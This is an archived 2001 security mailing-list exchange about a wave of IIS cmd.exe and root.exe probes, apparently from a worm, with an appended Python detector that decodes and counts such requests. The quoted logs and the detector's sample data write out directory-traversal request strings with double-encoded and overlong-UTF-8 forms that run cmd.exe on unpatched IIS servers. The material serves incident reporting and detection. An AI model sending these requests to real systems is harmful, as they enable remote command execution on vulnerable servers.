Mailinglist Archive: opensuse-security (556 mails)
Re: [suse-security] WEB IIS cmd exe requests
- From: Eric Mueller <eric.mueller@xxxxxxx>
- Date: Tue, 18 Sep 2001 17:17:30 +0200
- Message-id: <3BA7658A.3BE89FE2@xxxxxxx>
Same here..., so:
1) it's not you
2) we have logged around 220 tries from 100 different IPs since 15:00 CEST today.
I guess it's a new worm that uses CRII-infected servers as base infrastructure.
Eric
Togan Muftuoglu wrote:
> Hi,
>
> I thought Code RED was slowing down :-( Other than getting the regular
> GET "default.ida" requests, I have been logging things like this for the
> last two hours from different IPs.
>
> 1) Anyone else getting similar things, or is it me?
> 2) Is it worth bothering to send these logs to the providers of the IPs?
>
> TIA
>
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
> Sep 18 16:50:39 gardiyan last message repeated 3 times
>
> ::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
>
> --
> Togan Muftuoglu
>
> --
> To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
> For additional commands, e-mail: suse-security-help@xxxxxxxx
--
-----------------------------------------------
| Eric Mueller
| E.Solutions Central Europe
| Solutions Consulting
| EDS Informationstechnologie und Service GmbH
| Eisenstr. 56
| 65428 Ruesselsheim, Germany
-----------------------------------------------
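As an added example (not part of the thread, and not code by either poster): a small Python detector that parses access-log lines in the format quoted above, normalizes the request path the way a permissive server-side decoder would (percent-decoding repeated to a fixed point, so the double-encoded `%255c` and `%%35%63` forms collapse, plus folding of the overlong two-byte UTF-8 sequences such as `%c0%af` and `%c1%1c` that appear in the log), flags requests that name `cmd.exe` or `root.exe`, and tallies attempts per source address, which is the kind of count Eric reports (tries vs. distinct IPs). The embedded sample is constructed: five of the lines quoted in the thread plus two made-up lines (a benign request from 10.0.0.7 and a probe from 192.0.2.44). The lenient overlong folding, which does not insist on a valid continuation byte, is an assumption chosen so the detector sees what a permissive decoder would see.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample log: five lines quoted in the thread, one benign request
# and one probe from a second address (both made up for this example).
SAMPLE_LOG = """\
::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:10.0.0.7%1 - - [18/Sep/2001:16:51:02 +0300] "GET /index.html HTTP/1.0" 200 1234 "" ""
::ffff:192.0.2.44%2 - - [18/Sep/2001:16:52:30 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
"""

# Common-log-style line as quoted in the thread: client, ident, user, [ts], "req", status
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[0-9.]+)" (?P<status>\d{3})'
)

SUSPICIOUS_EXECUTABLES = ("cmd.exe", "root.exe")


def normalize_client(raw: str) -> str:
    """Strip the IPv4-mapped IPv6 prefix and the '%<n>' suffix seen in the log."""
    if raw.startswith("::ffff:"):
        raw = raw[len("::ffff:"):]
    return raw.split("%", 1)[0]


def fold_overlong_utf8(data: bytes) -> bytes:
    """Fold two-byte overlong UTF-8 lead bytes (0xC0/0xC1) into the ASCII byte
    they encode. Assumption: deliberately lenient about the second byte, so that
    %c1%1c folds to '\\' just as %c1%9c does."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def normalize_path(target: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) and fold overlong forms, then
    canonicalize separators and case so all the probe variants compare equal."""
    path = target.split("?", 1)[0]
    data = path.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = fold_overlong_utf8(unquote_to_bytes(data))
        if decoded == data:
            break
        data = decoded
    return data.decode("latin-1").replace("\\", "/").lower()


def classify(target: str) -> list:
    """Return the reasons a request target looks like one of these probes."""
    norm = normalize_path(target)
    reasons = []
    if any(exe in norm for exe in SUSPICIOUS_EXECUTABLES):
        reasons.append("shell-executable")
    if "/../" in norm:
        reasons.append("traversal")
    if norm != target.split("?", 1)[0].lower():
        reasons.append("encoded-path")
    return reasons


def parse_line(line: str):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["client"] = normalize_client(rec["client"])
    rec["status"] = int(rec["status"])
    return rec


def summarize(log_text: str) -> dict:
    """Count probe attempts per source address, the tally Eric's reply gives."""
    attempts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if "shell-executable" in classify(rec["target"]):
            attempts[rec["client"]] += 1
    return {"attempts": sum(attempts.values()),
            "sources": len(attempts),
            "per_source": dict(attempts)}


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

Note that the 404 status on every probe line is what a non-IIS server (as in the thread) returns; the detector keys on the normalized path rather than the status, so it still fires if a host answers 200.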